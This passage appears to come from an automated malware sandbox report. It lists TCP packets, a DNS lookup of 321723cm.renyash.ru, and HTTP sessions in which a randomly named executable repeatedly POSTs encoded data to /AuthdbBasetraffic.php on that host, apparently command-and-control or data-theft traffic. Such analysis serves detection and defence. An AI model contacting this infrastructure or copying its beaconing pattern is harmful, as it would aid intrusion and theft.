                                                                                                                          Dec 26, 2024 22:33:53.065932989 CET804991237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:53.066039085 CET804991237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:53.289803028 CET4991380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:53.409415960 CET804991337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:53.409452915 CET804991337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:53.409487009 CET804991337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:53.947751999 CET804991237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:53.991930008 CET4991280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.204323053 CET804991237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:54.258333921 CET4991280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.306678057 CET804991337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:54.352077007 CET4991380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.560309887 CET804991337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:54.602546930 CET4991380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.677131891 CET4976180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.678303003 CET4991280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.678304911 CET4991380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.679049969 CET4991980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.798312902 CET804991337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:54.798412085 CET4991380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.798609018 CET804991937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:54.798769951 CET4991980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.798904896 CET4991980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.798964977 CET804991237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:54.799041033 CET4991280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:54.918567896 CET804991937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:55.149146080 CET4991980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:55.268877983 CET804991937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:55.268938065 CET804991937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:55.268969059 CET804991937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:56.202860117 CET804991937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:56.258335114 CET4991980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:56.412729025 CET804991937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:56.461461067 CET4991980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:56.537812948 CET4992480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:56.657437086 CET804992437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:56.657505989 CET4992480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:56.657646894 CET4992480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:56.777293921 CET804992437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:57.008444071 CET4992480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:57.128473997 CET804992437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:57.128526926 CET804992437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:57.128561974 CET804992437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:58.019962072 CET804992437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:58.071014881 CET4992480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:58.272049904 CET804992437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:58.322901011 CET4992480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:58.529210091 CET4992480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:58.529211998 CET4992580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:58.649056911 CET804992537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:58.649136066 CET4992580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:58.649266958 CET804992437.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:58.649326086 CET4992480192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:58.649395943 CET4992580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:58.768949032 CET804992537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.008500099 CET4992580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.213964939 CET4993080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.223874092 CET4992580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.243242979 CET804992537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.243278980 CET804992537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.243309975 CET804992537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.333612919 CET804993037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.333673954 CET4993080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.333976030 CET4993080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.366832972 CET4993180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.385765076 CET804992537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.453552008 CET804993037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.486383915 CET804993137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.486459970 CET4993180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.486620903 CET4993180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.606138945 CET804993137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.680352926 CET4993080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.706192017 CET804992537.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.706434011 CET4992580192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.800111055 CET804993037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.800170898 CET804993037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.836636066 CET4993180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:33:59.956262112 CET804993137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.956315994 CET804993137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:33:59.956362963 CET804993137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:00.695497036 CET804993037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:00.742727041 CET4993080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:00.855385065 CET804993137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:00.898956060 CET4993180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:00.948220968 CET804993037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:00.992731094 CET4993080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.108277082 CET804993137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:01.164581060 CET4993180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.288362980 CET4993080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.288589954 CET4993180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.289246082 CET4993780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.408485889 CET804993037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:01.408505917 CET804993137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:01.408559084 CET4993080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.408592939 CET4993180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.408663034 CET804993737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:01.408741951 CET4993780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.408881903 CET4993780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.528301954 CET804993737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:01.758457899 CET4993780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:01.878109932 CET804993737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:01.878129959 CET804993737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:01.878149986 CET804993737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:02.771032095 CET804993737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:02.961488008 CET4993780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:03.024313927 CET804993737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:03.070992947 CET4993780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:03.145921946 CET4993980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:03.265568018 CET804993937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:03.265969038 CET4993980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:03.266130924 CET4993980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:03.385586023 CET804993937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:03.621087074 CET4993980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:34:03.740791082 CET804993937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:03.740801096 CET804993937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:03.740843058 CET804993937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:04.869204044 CET804993937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:04.880166054 CET804993937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:34:04.881252050 CET4993980192.168.2.437.44.238.250

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Dec 26, 2024 22:32:15.592617989 CET6356653192.168.2.41.1.1.1
                                                                                                                          Dec 26, 2024 22:32:16.108160019 CET53635661.1.1.1192.168.2.4

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Dec 26, 2024 22:32:15.592617989 CET192.168.2.41.1.1.10x37d3Standard query (0)321723cm.renyash.ruA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Dec 26, 2024 22:32:16.108160019 CET1.1.1.1192.168.2.40x37d3No error (0)321723cm.renyash.ru37.44.238.250A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • 321723cm.renyash.ru

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.44973137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:16.238518000 CET328OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 344
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:16.586913109 CET344OUTData Raw: 00 00 01 02 06 0b 01 01 05 06 02 01 02 00 01 05 00 0b 05 0c 02 0d 03 01 02 55 0f 07 03 01 02 05 0c 03 04 0e 02 01 06 01 0b 03 02 00 07 57 05 53 07 07 0d 0c 0c 05 01 01 06 05 06 06 06 55 04 01 00 51 0c 0b 07 56 01 09 0d 00 0c 55 0f 54 0e 06 06 03
                                                                                                                          Data Ascii: UWSUQVUTXQR\L~@hN~vqvXae]Pkluts]h]kYxl]xc}Y|mRcgpO~_~V@{SPb[
                                                                                                                          Dec 26, 2024 22:32:17.600750923 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:17.680147886 CET1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:15 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 1308
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 56 4a 7d 5e 7b 6e 67 06 6c 5c 64 4b 6b 72 67 03 7e 67 7b 0c 6b 63 69 42 6d 60 63 5c 7d 5b 6c 46 76 70 75 0d 79 07 7e 5f 76 76 78 07 69 71 78 01 55 4b 72 54 76 71 7b 01 68 5b 66 5e 68 77 66 0a 6f 48 7b 53 7c 73 5e 58 61 61 7e 5d 74 07 62 5a 7e 61 72 49 6a 6c 6c 0d 7d 49 73 06 77 66 7b 06 7c 5b 76 5d 7c 70 54 5a 79 67 60 06 6c 64 7f 59 6f 53 55 05 79 61 73 5b 78 5a 72 04 7f 63 68 44 7b 01 6c 4b 7e 4c 77 4f 76 07 6c 00 7a 51 41 5b 68 64 78 4f 7d 71 58 52 62 52 5d 5e 6f 7c 70 05 77 4e 72 40 79 61 57 02 7d 52 69 5b 78 4f 69 5a 76 05 6f 00 75 62 60 07 77 4f 62 50 7e 5d 79 5f 77 4c 6d 00 76 66 6c 09 7e 6f 75 04 77 7c 7b 5d 68 5d 6c 03 78 6f 63 03 6f 73 76 00 7c 6e 73 51 74 67 6f 5f 69 62 6d 50 69 53 7f 0a 7b 7d 50 4f 7d 5b 79 04 7b 5d 46 51 7f 52 63 53 7e 5e 59 52 6a 64 72 06 78 54 67 06 79 71 74 03 7c 61 64 59 7e 49 7b 0b 7f 70 71 42 7a 4d 7c 42 7e 61 63 59 74 63 5b 51 7b 5c 79 4b 75 58 52 07 7e 48 70 4d 7e 66 5f 41 74 72 59 03 7d 72 65 42 7d 67 54 08 79 76 52 0d 7e 5d 7b 49 75 62 61 07 77 61 7d 49 7c 4f [TRUNCATED]
                                                                                                                          Data Ascii: VJ}^{ngl\dKkrg~g{kciBm`c\}[lFvpuy~_vvxiqxUKrTvq{h[f^hwfoH{S|s^Xaa~]tbZ~arIjll}Iswf{|[v]|pTZyg`ldYoSUyas[xZrchD{lK~LwOvlzQA[hdxO}qXRbR]^o|pwNr@yaW}Ri[xOiZvoub`wObP~]y_wLmvfl~ouw|{]h]lxocosv|nsQtgo_ibmPiS{}PO}[y{]FQRcS~^YRjdrxTgyqt|adY~I{pqBzM|B~acYtc[Q{\yKuXR~HpM~f_AtrY}reB}gTyvR~]{Iubawa}I|Ov~|R~YwIwaH{L}J~`_{Yp{wRxSUyrxIzsT`xJ{gd}r{watJ}|ww`qSNu|`{ltHtpryOWI~RXzazFu]]wqxNwq\^ft\iOvKl|lawBZchD{|z`fC|wg^}Ln}}wzmr~\S|`dlxA~pR}wTxmyb`K_{J}gw|p}{sRO~LtKtMq{qSuXh|vpM~HmOwrkr[|Iz@xX|}]QJurSwOqI|aXF}Rx~Y{IvqwHzbm}paKxYtxglxSUz\x{sr{]NZxd`|bt]uaY]jlU}wx@hqyaBRNoldK``SSm__G~lX_z\yvxBagx[L~Jx^PtLSMaK^kywRsX~st{|oJxpy[~ltgx~\nzSYQdTqLjcHAkwK{QNP~`tB~Yq^omwKl[`~qtZ|dpShciOzppB~\Rt]iyryZw\B[igASu@c^FjzYQkeUUhQ|^{t\iu_}I|LI|^P|px]bbGW~n^RcUoUS`pR]SOwkW}D{qwCR{^Zu|YbbGQp`\Sd^QXbWYoC|R^XmYa}sXFPU@_yvy_b`DZ}cXXb_RYeYXa@iSkkypQpFxZ]_TtAQcWCPU@cd]FRwjnT|SX_d[f [TRUNCATED]
                                                                                                                          Dec 26, 2024 22:32:17.680169106 CET229INData Raw: 46 56 7e 7a 00 66 5e 75 4d 6c 61 70 0e 7a 5b 64 45 59 6e 6a 5a 63 76 7a 64 55 72 75 01 6a 60 78 5e 52 01 6b 54 69 62 03 5c 56 5b 54 5a 6a 67 71 40 7f 5e 5d 58 54 00 7b 46 52 6e 56 41 55 5a 0c 5b 57 05 02 06 53 63 0c 5f 54 5d 67 77 51 04 64 5b 71
                                                                                                                          Data Ascii: FV~zf^uMlapz[dEYnjZcvzdUruj`x^RkTib\V[TZjgq@^]XT{FRnVAUZ[WSc_T]gwQd[q_ZYzQA[hgNQrLbUCmG[ZeIVXbEW}^WbfXw^ZtvXcbNS|eYXaSZvP`bcl\~^pZz{|\ocDPqoWXdPRqMiZQneZy\_^{]FQhoOSsIi[Am`CTagS_zYYQxZRf
                                                                                                                          Dec 26, 2024 22:32:17.766592026 CET304OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 384
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:18.117593050 CET384OUTData Raw: 52 57 5d 5b 5b 5b 56 5b 5d 58 52 5a 56 5a 54 54 5f 5b 58 42 59 55 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RW][[[V[]XRZVZTT_[XBYUQ]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8?_?/ >%!<27<1=[>:)Y%=0-=')/ ].#[(
                                                                                                                          Dec 26, 2024 22:32:18.192038059 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:18.618942022 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:16 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 24 05 32 3e 30 11 23 12 30 13 28 2a 3e 51 36 3c 3a 41 27 39 20 00 2b 02 0b 03 2b 0d 03 0e 24 39 2d 07 36 2c 3b 0d 28 1f 3b 1e 3e 26 2b 59 01 1d 23 14 27 2b 38 5b 33 3a 3d 11 2d 3c 27 0b 2a 36 22 5c 28 29 2f 1b 3e 38 26 04 20 1f 39 08 3f 07 2a 59 39 05 3a 45 2a 30 29 1b 33 07 2c 51 02 11 38 50 35 0c 29 1c 36 3f 38 55 29 0a 3b 12 36 04 3c 50 26 03 39 1c 27 3f 21 04 27 2f 2e 5d 25 27 37 0c 30 02 21 18 26 32 3b 0e 26 2f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: $2>0#0(*>Q6<:A'9 ++$9-6,;(;>&+Y#'+8[3:=-<'*6"\()/>8& 9?*Y9:E*0)3,Q8P5)6?8U);6<P&9'?!'/.]%'70!&2;&/ ^"+T>\R
                                                                                                                          Dec 26, 2024 22:32:18.701118946 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1900
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:19.055107117 CET1900OUTData Raw: 52 56 5d 5e 5b 5f 56 50 5d 58 52 5a 56 5b 54 53 5f 52 58 48 59 5c 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RV]^[_VP]XRZV[TS_RXHY\QRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#Y.?>>Z'Y>%<,2 <4'=Z)2#&'=<9( ].#[(:
                                                                                                                          Dec 26, 2024 22:32:19.089050055 CET1236OUTData Raw: 22 5f 5b 18 30 04 50 09 0f 2c 21 18 3f 3d 01 2f 3e 34 31 5d 3f 0b 37 28 0b 35 0a 17 0f 5f 02 3c 11 30 06 16 32 3c 1f 01 11 2f 20 5e 21 0a 04 35 30 12 22 18 3e 3d 24 23 0b 5b 2d 31 31 00 3a 02 3b 21 5d 06 3a 5b 39 2c 17 26 5e 3c 32 34 2b 21 06 07
                                                                                                                          Data Ascii: "_[0P,!?=/>41]?7(5_<02</ ^!50">=$#[-11:;!]:[9,&^<24+!^<6&\.$!#1=#997<Z<R040^$0.9\6V).$",+ U#33!>U </#8;Q:=&59 3:/"*>]9=.(Z$1:9(8.*8.@23;_!9#>>*;->=.&]!3
                                                                                                                          Dec 26, 2024 22:32:19.206849098 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:16 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 24 05 32 3e 30 11 23 12 30 13 28 2a 3e 51 36 3c 3a 41 27 39 20 00 2b 02 0b 03 2b 0d 03 0e 24 39 2d 07 36 2c 3b 0d 28 1f 3b 1e 3e 26 2b 59 01 1d 23 14 27 2b 38 5b 33 3a 3d 11 2d 3c 27 0b 2a 36 22 5c 28 29 2f 1b 3e 38 26 04 20 1f 39 08 3f 07 2a 59 39 05 3a 45 2a 30 29 1b 33 07 2c 51 02 11 38 50 35 0c 29 1c 36 3f 38 55 29 0a 3b 12 36 04 3c 50 26 03 39 1c 27 3f 21 04 27 2f 2e 5d 25 27 37 0c 30 02 21 18 26 32 3b 0e 26 2f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: $2>0#0(*>Q6<:A'9 ++$9-6,;(;>&+Y#'+8[3:=-<'*6"\()/>8& 9?*Y9:E*0)3,Q8P5)6?8U);6<P&9'?!'/.]%'70!&2;&/ ^"+T>\R
                                                                                                                          Dec 26, 2024 22:32:19.512425900 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:19.722728014 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 24 04 27 2e 2f 05 23 3f 37 02 28 17 03 0a 22 11 08 41 24 17 24 07 28 12 21 01 2b 1d 04 55 30 2a 35 43 22 3c 2f 0a 28 08 2f 5c 3e 26 2b 59 01 1d 23 5c 27 15 0a 13 33 14 0f 12 3a 3c 23 08 3e 35 3d 01 3d 39 28 0f 29 3b 39 58 37 21 03 0c 2a 3a 2d 05 2f 3c 0c 06 3c 56 31 53 30 07 2c 51 02 11 3b 0e 21 54 21 55 36 59 38 56 3d 23 16 03 36 2a 2f 09 31 04 36 0b 27 2f 22 15 30 11 3a 5b 30 27 3f 0d 26 3b 3e 09 25 32 02 12 25 2f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: $'./#?7("A$$(!+U0*5C"</(/\>&+Y#\'3:<#>5==9();9X7!*:-/<<V1S0,Q;!T!U6Y8V=#6*/16'/"0:[0'?&;>%2%/ ^"+T>\R
                                                                                                                          Dec 26, 2024 22:32:20.139914036 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:20.494832993 CET2596OUTData Raw: 57 54 58 5b 5b 59 56 5c 5d 58 52 5a 56 5f 54 51 5f 5b 58 44 59 5f 51 59 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WTX[[YV\]XRZV_TQ_[XDY_QYPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ //-=,7^=Z?.7?(1!)5\'0*&,2Z+>X<? ].#[(*
                                                                                                                          Dec 26, 2024 22:32:20.565212011 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:21.083962917 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:18 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.44973337.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:17.969432116 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2592
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:18.321199894 CET2592OUTData Raw: 52 53 5d 55 5b 5d 53 59 5d 58 52 5a 56 5d 54 56 5f 59 58 46 59 5a 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RS]U[]SY]XRZV]TV_YXFYZQRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ;!=/=<!Z#/ 2.>Y(:%%X3&?7=+ ].#[(6
                                                                                                                          Dec 26, 2024 22:32:19.352791071 CET25INHTTP/1.1 100 Continue
